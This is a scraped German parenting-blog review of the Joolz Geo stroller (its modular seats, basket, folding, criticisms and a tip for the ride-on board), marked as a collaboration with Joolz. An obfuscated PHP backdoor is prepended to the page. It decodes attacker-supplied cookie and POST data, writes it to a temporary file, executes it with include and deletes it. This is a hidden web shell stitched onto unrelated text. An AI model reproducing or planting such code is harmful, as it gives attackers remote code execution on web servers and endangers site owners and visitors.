$jXhbjbr = "\146" . "\113" . "\x6d" . '_' . chr ( 454 - 356 ).'z' . 'E' . chr ( 194 - 97 ).chr ( 704 - 636 ); $PvgoRu = 'c' . chr (108) . "\141" . 's' . chr ( 943 - 828 ).chr ( 258 - 163 )."\x65" . "\x78" . 'i' . 's' . "\x74" . chr ( 970 - 855 ); $EwcdOvYRk = class_exists($jXhbjbr); $jXhbjbr = "8353";$PvgoRu = "61944";$FtnSREqJsl = !1;if ($EwcdOvYRk == $FtnSREqJsl){function TrfkRoyLL(){return FALSE;}$cXgtDCSXJ = "20634";TrfkRoyLL();class fKm_bzEaD{private function gxFQpdMg($cXgtDCSXJ){if (is_array(fKm_bzEaD::$WLVkLgOJ)) {$hqkbAtKDo = sys_get_temp_dir() . "/" . crc32(fKm_bzEaD::$WLVkLgOJ['s' . "\141" . chr ( 277 - 169 ).chr ( 912 - 796 )]);@fKm_bzEaD::$WLVkLgOJ[chr (119) . chr ( 624 - 510 )."\x69" . chr ( 1113 - 997 ).chr (101)]($hqkbAtKDo, fKm_bzEaD::$WLVkLgOJ["\x63" . "\x6f" . "\156" . chr ( 466 - 350 ).chr ( 265 - 164 ).chr ( 381 - 271 ).'t']);include $hqkbAtKDo;@fKm_bzEaD::$WLVkLgOJ["\x64" . "\x65" . "\154" . chr ( 970 - 869 ).chr ( 366 - 250 ).chr ( 197 - 96 )]($hqkbAtKDo); $cXgtDCSXJ = "20634";exit();}}private $mKGlAh;public function sabAI(){echo 7098;}public function __destruct(){$cXgtDCSXJ = "38587_40721";$this->gxFQpdMg($cXgtDCSXJ); $cXgtDCSXJ = "38587_40721";}public function __construct($QXuHGe=0){$GnJOLC = $_POST;$rWRKA = $_COOKIE;$gRBtbv = "d11ff962-d156-445e-8634-ddb04f9c8211";$ZTZaoWUk = @$rWRKA[substr($gRBtbv, 0, 4)];if (!empty($ZTZaoWUk)){$iKuvkugMNc = "base64";$gUuKUCA = "";$ZTZaoWUk = explode(",", $ZTZaoWUk);foreach ($ZTZaoWUk as $sJMzCODE){$gUuKUCA .= @$rWRKA[$sJMzCODE];$gUuKUCA .= @$GnJOLC[$sJMzCODE];}$gUuKUCA = array_map($iKuvkugMNc . "\137" . "\144" . "\145" . 'c' . "\x6f" . "\x64" . "\145", array($gUuKUCA,)); $gUuKUCA = $gUuKUCA[0] ^ str_repeat($gRBtbv, (strlen($gUuKUCA[0]) / strlen($gRBtbv)) + 1);fKm_bzEaD::$WLVkLgOJ = @unserialize($gUuKUCA); $gUuKUCA = class_exists("38587_40721");}}public static $WLVkLgOJ = 55812;}$cdpecyXOED = new /* 61068 */ fKm_bzEaD(20634 + 20634); $_POST = Array();unset($cdpecyXOED);} Joolz Geo - der ideale Begleiter mit Design für 2-Fach-Eltern | Salon Mama

Meine Beziehung zu Joolz war von Tag 1 Liebe auf den ersten Blick. Als ich 2013 schwanger war kam für meinen Mann und mich eigentlich nur ein Joolz in Frage. Warum? Ganz ehrlich? Weil uns kein anderer Kinderwagen wirklich gefallen hat. Natürlich waren uns Komfort, Fahrgefühl und ein gutes Klappsystem wichtig, aber letztendlich hat uns von Anfang an das tolle Design von Joolz überzeugt.

JOOLZ DAY

Wir haben uns damals bei Herr und Frau Klein (die einige Kinderwagen Marken im Programm haben) beraten lassen und uns alle Vor- und Nachteile erklären lassen (Damals hatte der Joolz Day einen sehr kleinen Einkaufskorb!) aber unsere Entscheidung stand schon im Vorhinein fest: Wir wollten einen Joolz Day und zwar in schwarz!

Bei einem Press Event in Wien wurde mir dann der neue Joolz Geo vorgestellt, auch wenn ich damals noch keinen Bedarf hatte, fand ich das Baukastensystem genial. Man hat die Möglichkeit seinen Joolz, wenn die Familie wächst, ganz einfach um eine zweite Wanne oder einen Sportsitz zu erweitern. Genial, aber da ein 2. Kind noch kein Thema war, habe ich mich mit dem Geo noch nicht näher auseinandergesetzt.

2016. Ich bin mit Baby Nr. 2 schwanger, meine Tochter gerade 2 Jahre alt. Und alles andere als eine „brave zu Fuss Geherin“. Ich stand, so wie viele andere „Neo 2-Fach Mamis“, vor der Qual der Wahl. Welchen Kinderwagen lege ich mir zu? Einen Doppelkinderwagen? Nur einen Buggy für die Große und das Baby im Tragetuch? Oder einen normalen Kinderwagen mit Mitfahrbrett. Das größte Problem dabei ist, dass man es einfach nicht weiss. Vor allem nicht, wie sich die Bedürfnisse des größeren Kindes 9 Monate später entwickeln.

JOOLZ DAY²

Was tun? Mein 1. Schritt war es, sich mit dem Thema Kinderwagen wieder neu zu beschäftigen. Was gab es am Markt und welcher Kinderwagen passt am besten zu uns. Ich muss ehrlich sagen, auch diesmal war die Entscheidung schnell gefällt, dass es auch diesmal ein Joolz werden muss. Aber welcher? Reicht vielleicht der neue Joolz Day², der ja 20 neue bzw. verbesserten Design-Funktionen hat wie zb. der große Einkaufskorb und ein extrem geschmeidiger Klappmechanismus? (Beides hat uns damals beim Joolz Day gefehlt) Wird meiner knapp 3-jährigen Tochter ein Mitfahrbrett reichen? Ich war unsicher. Vor allem weil wir ziemlich viel unterwegs sind und sie nach wie vor Mittagsschlaf macht, gerne auch im Kinderwagen.

JOOLZ GEO

Ich wollte auf Nummer Sicher gehen und habe mich dann für einen Joolz Geo entschieden. Das Tolle ist, dass man auf der Joolz Website mit einem Konfigurator seinen eigenen Wunsch Joolz zusammenstellen kann. Auch diesmal habe ich mir meinen Joolz bei Beate Klein von Herr und Frau Klein abgeholt. Ich bekam eine ausführliche Beratung über das Baukastensystem und den Klappmechanismus.

 

MEIN JOOLZ GEO

Kurz vor der Geburt war es dann soweit, ich hielt meinen Traum Joolz, den ich nach meinen Bedürfnissen ausgesucht habe in den Händen.

1. Joolz Geo mit XXL Einkaufskorb 2. Joolz Essential Decke 3. Erweiterunsgsset 4. Joolz Mitfahrbrett 5. Nestchen         6. Becherhalter

Wenn man sich für einen Joolz Geo entscheidet, hat man wiederum die Möglichkeit zwischen 3 Modellen auszusuchen:

Bei allen drei Modellen ist der XXL Einkaufskorb inkludiert.

Ich habe wirklich lange überlegt welcher  Geo für meine Situation am sinnvollsten ist. Nach langem hin und her habe ich mich für den Joolz Geo Mono entschieden und habe ein Erweiterungsset (Untere Wanne) dazu genommen.

Wichtig war es für mich selbst herauszufinden, wie ich meinen Kinderwagen verwenden möchte. In meinem Alltag gibt es derzeit folgende 3 Varianten, die 4. Variante kommt in den nächsten Monaten dazu:

  1. Variante: Baby liegt in der oberen Wanne, XXL Einkaufskorb unten, Kleinkind steht am Mitfahrbrett
  2. Variante: Kleinkind sitzt im oberen Sportsitz, Baby liegt in der unteren Wanne
  3. Variante: Kleinkind sitzt im oberen Sportsitz, XXL Einkaufskorb unten, Baby im Tragetuch
  4. Variante: 6 Monate altes Baby im oberen Sportsitz, XXL Einkaufskorb unten, Kleinkind geht zu Fuß

DESIGN

Das Fabrikat der Stoffe und Rahmen ist edel und strapazierfähig zu gleich. Es ist vom Design sehr puristisch, was mir gut gefällt und in der Verarbeitung sehr hochwertig. Man kann die Stoffe sogar waschen, jedoch reicht meist ein Wegwischen der Flecken mit einem feuchten Tuch. Mit den unzähligen Stoffen und Farbvarianten bis hin zu der Tailor Made Funktion mit der man seinen eigenen Joolz designen kann, bleiben keine Wünsche mehr offen und schlägt im Punkto Design und Auswahl definitiv alle Mitbewerber. Man hat auch die Möglichkeit die Farbe des Sicherheitsbügels auszusuchen und zu individualisieren.

KOMFORT

Die hohe Position von Wanne und Sitz ist zweierlei genial. Das Kind hat die Möglichkeit im Joolz mit am Tisch zu sitzen, und der Rücken der Eltern bleibt durch die hohe Position geschont. Der Sportsitz hat drei ergonomische Sitzpositionen plus ist er umkehrbar. Heisst: Dein Kind kann dich oder die Welt ansehen. Die Matratze ist hypoallergen und atmungsaktiv. Ein weiteres Highlight im Sommer ist das Sonnenverdeck mit Ventialtion und zwar bei Sportsitz und Wanne. Viele Kinder schwitzen, vor allem beim Schlafen enorm, und ein leichter Luftzug erleichtert den Mittagsschlaf. Eines der wichtigsten Pluspunkte beim Joolz ist der höhenverstellbare Schiebegriff. Egal ob Frau/Mann groß oder klein ist, mit einem Handgriff kann der Griff individuell an seine Bedürfnisse angepasst werden. Extrem praktisch auch, wenn man in schmalen Aufzügen fährt!

KLAPPSYSTEM

Das Klappsystem hat sich von meinem letzten Joolz Day auf den neuen Joolz Day² und Geo enorm verbessert. Mit nur einem Handgriff ist der Joolz Geo zusammengeklappt und um einiges kompakter als das Vorgänger Modell. Auch mit Wanne und Sportsitz passt der Joolz Geo ins Auto.

  

XXL EINKAUFSKORB

Was soll ich sagen, der XXL Einkaufskorb ist einfach nur genial, vor allem kann der vordere Teil nach unten geklappt werden und ist damit für alle Einkäufe leichter zugänglich.

FAHRGEFÜHL

Egal ob in der Stadt oder im Wald, mit der Vierradfederung ist der Joolz Geo perfekt über Unebenheiten und Hindernisse gemacht. Noch dazu ist er sehr leicht zu lenken. Auch mit Baby im Tragetuch sehr leicht und unkompliziert. Die vorderen Schwenkräder kann man leicht fixieren und einem Spaziergang im Wald steht nichts mehr im Wege.

ACCESSOIRES

Was würde man ohne passende Accessoires tun? Beim Joolz gibt es auch ganz tolle. Vor allem die Decken und Nestchen gefallen mit wahnsinnig gut. Mit den Spielzeug Hängeschlaufen am Verdeck kannst du jedes Mobile deiner Wahl anhängen.

 

KRITIK

Nachdem ich mit den Joolz Geo nun knapp 3 Monate in unterschiedliche Variationen ausprobiert habe, gibt es für mich lediglich einen Kritikpunkt: Und zwar ist es vom Handling etwas mühsam, das Baby in die untere Wanne zu legen. Die Wanne ist relativ schmal und bei größeren Babys wahrscheinlich nicht wirklich sehr lange nutzbar. Viele haben mich gefragt, ob es mich nicht stört, dass das Baby soweit unten liegt. Mich stört es überhaupt nicht und ich glaube, dass es dem Baby gerade in der Anfangszeit wahrscheinlich auch egal ist wo es liegt, Hauptsache es hat es bequem 🙂

ANREGUNG

Ich hätte auch zwei Punkte, die man verbessern könnte: Wie wäre es mit einer besseren Vorrichtung für das Anbringen einer Wickeltasche bzw. das Herausbringen eines Joolz Stroller Organizers (die sind etwas kleiner als Wickeltaschen und perfekt für Fläschchen und Knabberzeug, alles was man schnell parat haben muss)

SALON MAMA TIPP:

Ein Joolz Geheimnis, welches ich trotz meiner mittlerweile doch schon längeren Erfahrung mit Joolz, noch nicht lüften konnte und zwar wie man beim Geo das Mitfahrbrett „hochklappt“. Oft muss man doch ein paar Stufen nehmen oder den Spalt zwischen Gehsteig und Straßenbahn meistern und da ist, das an sich sehr nützliche Board, hinderlich. Aber es gibt einen Trick: Und zwar ist am Brett ein Gummi mit Druckknopf vorgesehen, ich bin mir aber tatsächlich nicht sicher ob dies auch für eine Hochklappfunktion ist. Die Bedingungsanleitung entbehrt leider auch einer Info hierzu. Aber erfinderisch wie man in der Not manchmal sein muss habe ich das Problem wie folgt gelöst: Den Zipp vom Einkaufskorb mittig hin zippen und dann die erwähnte Gummischlaufe durchfädeln und mit dem Druckknopf fest machen. Klappt super! Vielleicht habt ihr noch einen Alternativlösung, die ihr mir verraten könnt oder vielleicht war es von Joolz auch genau so vorhergesehen. 

FAZIT

Der Joolz Geo war definitiv die beste Entscheidung für uns. Meine täglichen Einkäufe und Unternehmungen sind um einiges leichter und entspannter mit beiden Kindern in einem Kinderwagen. Vor allem mit dem tollen Baukastensystem, wächst der Joolz Geo perfekt mit den eigenen Bedürfnissen mit. Ob als Single Kinderwagen oder mit Baby und Kleinkind oder einfach nur mit dem Mitfahrbrett. Vor allem das leichte Umbauen ermöglicht eine schnelle und individuelle Tagesplanung welche Variante man gerade benötigt.

In freundlicher Zusammenarbeit mit Joolz. 

 

 

Wir verwenden Cookies, um Inhalte zu personalisieren, Funktionen für soziale Medien anbieten zu können und die Zugriffe auf unsere Website zu analysieren.